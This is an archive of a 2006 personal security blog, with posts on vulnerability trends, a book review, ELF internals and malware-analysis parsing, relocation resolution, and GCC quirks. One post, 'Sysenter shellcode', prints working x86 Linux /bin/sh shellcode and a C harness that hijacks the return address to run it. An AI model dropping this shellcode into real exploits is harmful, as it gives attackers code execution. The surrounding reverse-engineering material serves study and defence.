EM_386: 2006

Sunday, December 10, 2006

A Vulnerability Renaissance

After a conversation with a friend of mine it is my opinion that the security industry is evolving, but like many other technology industries will repeat its own past in due time. In the early 2000's new techniques for exploiting the traditional vulnerability classes (stack, heap, race, format) were coming out at a rate of every few months. Every application written in C/C++ has since undergone intense scrutiny to eradicate all of these vulnerabilities. Thus we dont see a new stack/heap/race/format advisory everyday like we used to 3 years ago. The ones we do see are complex and obscure enough to evade the common code auditor with less skill. As an industry we havent seen a new bug class emerge for quite some time, the latest being the explosion of XSS techniques. This in my opinion is partly due to the nature of attacking software at such a high level, there are just so many more directions to poke in.

How long before we undergo a sort of vulnerability renaissance and new bug classes emerge at lower levels? Will we once again see daily advisories for apache/bind/sendmail/ssh? For those who say its impossible due to the amount of code auditing performed on these applications all I can say is look at the past 4-5 years of bugtraq/full-disclosure postings. It took many years to find bug classes in languages that are in some cases older then the researcher who found them.

As a side note I find it quite interesting how just one new bug class that can be easily exploited in C/C++ applications will probably fuel another 5-10 years of security industry revenues. This is because a large percentage of deployed protections will need to be re-evaluated. This sort of possibility should be a wakeup call to anyone working in security, that all vulnerabilities are never known and threat/risk models can change overnight with a few lines of code. I personally hope we do witness this renaissance soon. Not only because that means it was discovered by someone responsible with enough brains to make us all aware but also because history has taught us it inevitable and I would like to see it sooner rather then later (this makes the classic assumption that there is a possibility the bad guys already possess this knowledge and are using it to their advantage). This possibility should further fuel our progression towards pro-active security defenses, as reactive systems have shown us they cant protect you from tomorrows bugs. Memory protection techniques (ASLR, NX, etc...) are a step in the right direction. But we dont know what tommorrow will bring. And thats my security rant for the day.

Saturday, December 02, 2006

The Art of Software Security Assessment Review

The Art Of Software Security Assessment arrived yesterday and I have been furiously taking it in. Im sure many other people are going to review this book so I will keep it short. This book rocks for a couple of reasons.

#1 The authors. Its the same reason 'Shellcoders Handbook' was such a success. You need people with real world experience writing this kind of stuff.

#2 The level of detail. This book goes very deep. Especially the chapter on C language vulnerabilities. Mark Dowd was nice enough to release this chapter last month before the books release. I read that chapter from PDF last month, it covered signed/unsigned variable issues better then any book I have ever read. Most books go about as deep as strcpy(). Its the obscure details of specific languages and operating systems that make vulnerability hunting so much fun.

#3. Chapter 16 is great. It covers attacking network application protocols. Sometimes its really hard to explain a protocols standard and then relate it to attacking its implementation. This time they got it right. READ THIS CHAPTER.

Normally a book that covers everything from specific language details to attacking networking protocols is spread too thin. But these massive 1200 pages cover it perfectly. Now when someone asks me how to get started in my line of work I have an answer. 'Learn an OS ins/outs, learn a couple programming languages and read this book cover to cover'. I wont be putting this book on the shelf for a long time.

Sunday, November 26, 2006

Sysenter shellcode

Not much going on tonight. Whipped up some useless shellcode using the sysenter syscall method as opposed to `int 0x80`, nothing new. The size increase from using int 0x80 is pretty small too. I have seen some other shellcodes using the 'push ecx, edx, ebp, sysenter' method, this one is a little bit smaller. I wrote it on Ubuntu (Dapper-Drake), the %gs offset may need adjusting on other systems. Here it is,

static char code[] =
"\x31\xc0"              /* xor %eax, %eax */
"\x50"                  /* pushl %eax */
"\x68\x2f\x2f\x73\x68"  /* /bin/sh */
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"              /* mov %esp, %ebx */
"\x50"                  /* push %eax */
"\x53"                  /* push %ebx */
"\x89\xe1"              /* mov %esp, %ecx */
"\x31\xd2"              /* xor %edx, %edx */
"\xb0\x0b"              /* mov $0xb, %al */
"\x65\xff\x15\x10";     /* call *%gs:0x10 */

__attribute__((noreturn)) int main()
{
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)code;
}

I wonder how many shellcodes would fail if you disabled the use of `int 0x80` interrupt from userspace on a honeypot. I cant think of any valid applications that would break, but im sure some would. That would be an interesting experiment.

Saturday, October 28, 2006

ELF - No Section Header? No Problem

During the research and development process of some private anti-malware tools of mine I have come to the conclusion that there just isnt enough documentation around on ELF malware analysis. This is obviosuly because the ratio of PE to ELF malware is probably around 100 to 1. This doesnt mean unix systems don't get infected or attacked on a daily basis. It just means the attacks are either more stealthy or dont occur as often.

Infection techniques are not neccessarily what I have been researching. Its more of the obfuscation techniques that common malware uses. Just about every ELF monkey has heard of the ELF Kickers suite of tools. One of the utilities that comes with that tarball is sstrip. Its a utility for stripping the section header from an ELF binary. In Linux, the linker and loader do not require that an ELF object of type ET_EXEC has a section header, only a program header is needed. The removal of the section header is done by changing the elf header e_shnum and e_shentsize values to 0 and then stripping or zeroing out the section header itself. Unfortunately ANY tools based on the BFD libraries are hopelessly dependent on the ELF section header. And whats worse many other open source and commercial tools can be _easily_ fooled by tweaking certain values in the section header (this is sad but true, but most will blindly follow the section header details without stopping to think thats NOT what the OS loader would do!).

SStriping the section header, and any other dead code in the ELF object is an obvious no brainer for a malware author. Not only does it save size but it makes the malware that much harder to analyze. This is nothing new, sstrip has been around for 5 years. Plenty of discussion has raged over this topic. What I find most surprising is the lack of section header rebuilding tools or tools that completely ignore the section header and parse the ELF object correctly (I am told IDA does this correctly, I do not own a copy). So in this post I present to you the correct way to partially rebuild an ELF section header while grabbing some more interesting data along the way (my example is rebuilding a partial symbol table). I present this information _not_ as something new, (like I said before sstrip is 5 years old now), but as information to help others write better tools in the future.

First off lets assume the ELF object we are analyzing has had its entire section header sstriped away. Lets also assume this binary was compiled with GCC and does have some symbol relocation happening at runtime. The very first thing we want to do is parse the program header for the DYNAMIC segment. Once we have the address of the DYNAMIC segment we want to iterate over that segment and use the Elf32_Dyn struct that is defined in /usr/include/elf.h

First let me explain what the dynamic segment holds. The dynamic segment is actually the start of the .dynamic section in a gcc compiled binary. It contains a wealth of values that will help us to begin piecing back together our ELF section header. Each one of our dynamic entries is going to contain a different value stored in the d_tag member of the struct. For example in our case if dyn->d_tag == DT_REL then this means that dyn->d_un.d_val == 'start of of a reloctable section'. In the case of our gcc binary its probably the .reldyn section. Many bits and pieces of the section header can be pieced back together this way. Offsets for sections such as .interp, .ctors, .strtab, .hash, .symtab, .reldyn and .relplt can be found using the DYNAMIC segment. Most of these sections will have to be parsed to find their other section header values such as size and sh_link members etc...

I can't very well end this post without a good example. So here is how to parse the symbol tables of a binary thats been sstriped using the data from the DYNAMIC segment.

Steps:

#1. Parse the program header to find the DYNAMIC segment
#2. Grab the address of your strtab section by finding a DYNAMIC segment entry with d_tag type of DT_STRTAB
#3. Grab the address of your symbol table by finding a DYNAMIC segment entry with d_tag type of DT_SYMTAB
#4. Get the size of the string table by reading the nchains value from the Hash table which you can find from the DYNAMIC segments d_tag of type DT_HASH
#5. Loop through the symbol table using the Elf32_Sym struct. Refer to the location of your string table and use the st_name value to find the string that corresponds with the symbol entry your parsing.

http://chris.rohlf.googlepages.com/phdr_syms.c.txt Please go there to find the code that accomplishes steps 1 through 5. I make no guarantee or warranty on this code whatsoever :)

One could easily build upon the code above to find the complete symbol data for a sstriped object by also parsing the relocatable sections of the binary by looking for dynamic segment entries with d_tag = DT_JMPREL || DT_RELDYN and using the Elf32_Rel structure. Thats all for now though. Thanks for reading.

UPDATE: Cleaned up some errors in the old code and now uses the hash tables nchains value to find the # of symbols

Tuesday, October 17, 2006

Nvidia Overflow

This Nvidia driver bug is a nasty one. I looked at the POC code and started thinking about all the different attack vectors for this. Quite scary. Think about it, this is a driver bug that can be reached by manipulating client software (malicious website, anything that talks to X etc...). Its about time someone started looking at closed source software in Linux. Much credit to Derek Abdine for this find.

Tuesday, October 10, 2006

Resolving ELF Relocation Name / Symbols

Updated October 4th 2007

I have updated this post to be more accurate as at least 5-10 people a day find it looking for information on ELF relocations/symbols.

From the ELF 1.2 standard:

"Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. In other words, relocatable files must have information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process's program image. Relocation entries are these data."

Each 'call' instruction in your ELF object that calls a function located in a shared object (the function puts() for example) is instead going to call an address in the Procedure Linkage Table (.plt). The PLT is going to resolve the functions real address at runtime. This is because we don't know where the shared library will be loaded in memory at runtime. Lets look at an example ELF object:

Heres a call to a location '0x804833c' within our .text segment:

$ objdump -d example-elf | grep 804833c | grep call
804843f: e8 f8 fe ff ff call 804833c

Here is our PLT. Notice the address '0x804833c' that was called. It's just a jmp to the location at *0x8049684.

$ objdump -d example-elf | grep "section .plt:" -A 31

Disassembly of section .plt:

080482fc <__gmon_start__@plt-0x10>:
80482fc:       ff 35 70 96 04 08       pushl  0x8049670
8048302:       ff 25 74 96 04 08       jmp    *0x8049674
8048308:       00 00                   add    %al,(%eax)
     ...

0804830c <__gmon_start__@plt>:
804830c:       ff 25 78 96 04 08       jmp    *0x8049678
8048312:       68 00 00 00 00          push   $0x0
8048317:       e9 e0 ff ff ff          jmp    80482fc <_init+0x18>

0804831c <__libc_start_main@plt>:
804831c:       ff 25 7c 96 04 08       jmp    *0x804967c
8048322:       68 08 00 00 00          push   $0x8
8048327:       e9 d0 ff ff ff          jmp    80482fc <_init+0x18>

0804832c <__stack_chk_fail@plt>:
804832c:       ff 25 80 96 04 08       jmp    *0x8049680
8048332:       68 10 00 00 00          push   $0x10
8048337:       e9 c0 ff ff ff          jmp    80482fc <_init+0x18>

0804833c :
804833c:       ff 25 84 96 04 08       jmp    *0x8049684
8048342:       68 18 00 00 00          push   $0x18
8048347:       e9 b0 ff ff ff          jmp    80482fc <_init+0x18>

0804834c :
804834c:       ff 25 88 96 04 08       jmp    *0x8049688
8048352:       68 20 00 00 00          push   $0x20
8048357:       e9 a0 ff ff ff          jmp    80482fc <_init+0x18>

(Remember that little * means the address at 0x8049684) If we look at whats at *0x8049684 we find an entry in the Global Offset Table (GOT) as shown as below.

$ objdump -s example-elf | grep got.plt -A3

Contents of section .got.plt:
804966c 98950408 00000000 00000000 12830408  ................
804967c 22830408 32830408 42830408 52830408  "...2...B...R...

At 0x8049684 we find another address '42830408' which in little endian is 08048342. If you go back up and look at our PLT you will find at 0x8048342 is a push instruction which is directly after our first jmp. It looks like this "push $0x18". 0x18 (24) is the offset into our relocation tables. That is followed by a jmp instruction back to the beginning of our PLT "jmp 80482fc". You may have noticed the beginning of the PLT looks slightly different then the rest of it. These first two instructions "pushl 0x8049670" and "jmp *0x8049674" are important. The first pushes the address at 0x8049670 on the stack (which points to our GOT), and then calls the address located at *0x8049674, which again is located in our GOT. Both of these addresses at those locations are going to be 0x0 in your ELF file, because they are filled in at runtime. At runtime the first value will be a number which identifies the particular library being used and the second will be an address of the linkers symbol resolution routines. These routines will use that offset of 0x18 that was pushed onto the stack earlier to resolve the correct relocation.

This process is called lazy linking, because the relocation is only resolved at runtime when it is needed. After the first time its looked up by the linker, the linker will then edit it's GOT entry, so that when the PLT performs its first jmp *, it will jump directly to the function instead of back to the PLT to push its offset into the relocation tables.

Now, how do we get symbol names for relocation entries? After all we want to see 'snprintf' instead of '0x8049688' ...

When a section has type SHT_REL it contains a bunch of structures that look like this:


 typedef struct
 {
      Elf32_Addr r_offset;    /* Address */
      Elf32_Word r_info;    /* Relocation type and symbol index */
 } Elf32_Rel;

Lets look at readelf reading the relocation entries on an ELF object:

$ readelf -r /testbins/sha1


 Relocation section '.rel.dyn' at offset 0x420 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
 0804b54c  00001106 R_386_GLOB_DAT    00000000   __gmon_start__
 0804b598  00000505 R_386_COPY        0804b598   stderr
 0804b59c  00000d05 R_386_COPY        0804b59c   stdin

 Relocation section '.rel.plt' at offset 0x438 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
 0804b55c  00000107 R_386_JUMP_SLOT   00000000   feof
 0804b560  00000207 R_386_JUMP_SLOT   00000000   putchar

Where do all these entries for each symbol come from?! Offset/Info/Type/Value/Name I didnt see any of those in that struct! Well most of these values are going to be pulled from the r_info field, or using a value from the r_info field to find what we are looking for. The offset value is where in our PLT you can find the relocation. If you were to disassemble your binary you would see a jmp to this address at the correct offset inside the PLT. The field we want to look at here is the r_info field. There are two (well actually three, the third is a combination of 1 and 2) important macros held in elf.h we will be using.


 #define ELF32_R_SYM(val) ((val) >> 8)
 #define ELF32_R_TYPE(val) ((val) & 0xff)

Each of these macros is designed to take in the r_info field and output a different result. Lets back up a step. The section header that has type SHT_REL (the relocation section we are looking at) is going to have another member called 'sh_link'. This holds an important value. The sh_link value is a pointer to another section thats going to hold symbolic information for these relocations - including its function name string. It is typically the section labeled 'dynsym' by GCC. This is readelf parsing the section header of /bin/ls (cropped for readability).

$ readelf -S /bin/ls

   There are 26 section headers, starting at offset 0x126d8:

 Section Headers:
 [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
 ...
 [ 4] .dynsym DYNSYM 080484a0 0004a0 0006b0 10 A 5 1 4
 ...
 [ 8] .rel.dyn REL 08049170 001170 000028 08 A 4 0 4
 [ 9] .rel.plt REL 08049198 001198 0002f0 08 A 4 11 4
 ...

Notice the sh_link member of both sections 8 and 9. Its the #4 which points us to our dynamic symbol table section. Thats where the symbol names that correspond with our relocation entries can be found. So lets recap. #1 scan the section header for a section that is type SHT_REL #2 grab its sh_link member value.

Ok so where does that leave us, we have a bunch of numbers but how do we know what matches up where. Well as we iterate through the relocation table entries we run each r_info value through our ELF32_R_SYM(val) macro and we get a number back. That number corresponds to an entry in the dynamic symbol table (or wherever our sh_link member points us to). Parse that entry in the dynamic symbol table and your symbol name will be resolved.

What about the other macro? Well the other ELF32_R_TYPE(val) is going to tell us what kind of relocation this is. These values are defined in elf.h as R_386_GOT32, R_386_JMP_SLOT and so on. Their definitions as well can be found in elf.h. These are very helpful for trying to find out if this relocation is a function or not (it usually is when found in the rel.plt section).

Remember, not all ELF objects will have a section header. In those cases you can use the program header, to find and parse the dynamic segment. Which will also give you the address of your relocation tables, dynamic symbol tables and more. If you find any errors in this post, feel free to let me know.

Free BSD Local DOS Bug (IDefense)

This summary is not available. Please click here to view the post.

Wednesday, October 04, 2006

The Linux Kernel Binary Format Handler (bugs?)

Ok well tonight I read this short paper from shellcode.com.ar. It covers a supposed 'bug' in the linux kernel ELF loader. It does not report this bug as a vulnerability, these guys have released some quality content in the past so I will not immediately toss this one to the side with a 'you have to be root.." blah blah. Ok well its true you have to be root to insert a kernel module, which is the technique they have used for hijacking the binary loader. Basically the bug can be described very easily, an attacker (who has already gained root access) can hijack the linked list of binary format handlers in the kernel. The default action of the kernel is to check an executable's format at runtime against that newly registered binary format handler instead of the pre-existing ones first. The authors of the paper said from the beginning it was a technique that could be used by a rootkit writer to stay hidden. I for one applaud their work for one simple reason , rootkit detection software now has one more place to look. But thats about it. Id like to see the kernel check against ELF, a.out, COFF before checking against the newly registered format but I am a firm believer in a static kernel anyway (I dont enable the ability to load kernel modules on my boxes).

Friday, September 22, 2006

Obscure GCC Functionality

I spent some time tonight playing around with GCC (v4.0.3-1ubuntu5) macros and came across some 'oddness'. Ever use the 'noreturn' attribute? Yah me either. It looks a litle something like this:


void test_func() __attribute__((noreturn));

We are basically telling GCC that the function 'test_func()' will not return. By further research we see this means that no 'leave' or 'ret' instruction will be setup after 'test_func()' is called and the return address will not be set for the instruction that sits immediately after 'call test_func()'. Heres some sample C code.


/* no return attribute */
void test_func() __attribute__((noreturn));

int count = 0;

int main(int argc, char *argv[])
{

test_func();

return 0;
}

void test_func()
{

/*
A variable to count how many times
we have been inside this function
*/
count++;

printf("count=[%d]\n", count);

int *ptr1, *ptr2, *ptr3, *ptr4;

ptr1 = __builtin_return_address(0);
/* test_func() will return to this address */
ptr2 = __builtin_return_address(1);
/* main() will return to this address */
ptr3 = __builtin_frame_address(0);
/* current frame address of test_func() */
ptr4 = __builtin_frame_address(1);
/* current frame address of main() */

printf("\ntest_func() returns to %x\n"
"main() returns to %x\n"
"current frame addy of test_func() %x\n"
"current frame addy of main() %x\n\n",
ptr1, ptr2, ptr3, ptr4);
}

The disassembly listing below confirms that there is no leave/ret instruction. Compare the address called against the output of the program above.


08048360 main:
8048360:       55                      push   %ebp
8048361:       89 e5                   mov    %esp,%ebp
8048363:       83 ec 08                sub    $0x8,%esp
8048366:       83 e4 f0                and    $0xfffffff0,%esp
8048369:       b8 00 00 00 00          mov    $0x0,%eax
804836e:       83 c0 0f                add    $0xf,%eax
8048371:       83 c0 0f                add    $0xf,%eax
8048374:       c1 e8 04                shr    $0x4,%eax
8048377:       c1 e0 04                shl    $0x4,%eax
804837a:       29 c4                   sub    %eax,%esp
804837c:       e8 00 00 00 00          call   8048381 
              Notice the missing leave/ret instructions

08048381 :
8048381:       55                      push   %ebp
8048382:       89 e5                   mov    %esp,%ebp
8048384:       83 ec 28                sub    $0x28,%esp

... rest of test_func() goes here

So when test_func() ends the instructions at the address EIP holds are executed. In this case that puts us right back in test_func(). The second time through test_func() the return address is set to '1'. Which of course results in a segmentation fault.


./1
count=[1]

test_func() returns to 8048381
main() returns to b7dfbea2
current frame addy of test_func() bf84a888
current frame addy of main() bf84a8a8

count=[2]

test_func() returns to 1
main() returns to b7dfbea2
current frame addy of test_func() bf84a88c
current frame addy of main() bf84a8a8

Segmentation fault (core dumped)

$gdb -core=core -q
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Failed to read a valid object file image from memory.
Core was generated by `./1'.
Program terminated with signal 11, Segmentation fault.
#0  0x00000001 in ?? ()
(gdb) info reg
eax            0x87     135
ecx            0x0      0
edx            0x87     135
ebx            0xb7f11adc       -1208935716
esp            0xbf84a894       0xbf84a894
ebp            0xbf84a8a8       0xbf84a8a8
esi            0xbf84a934       -1081824972
edi            0xbf84a8c0       -1081825088
eip            0x1      0x1
eflags         0x210292 2163346
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

At this point we could use the ptrace() API for setting the return address correctly, but whats the point. Now this is of course the correct behavior for GCC. But sometimes its fun exploring the more obscure side of the most widely used open source compiler.

- chris

Thursday, September 21, 2006

Giving in . . .

So I am finally giving in and making a blog . . . Like everyone else in the world. I figure it's a good place to post code and complaints etc...

- chris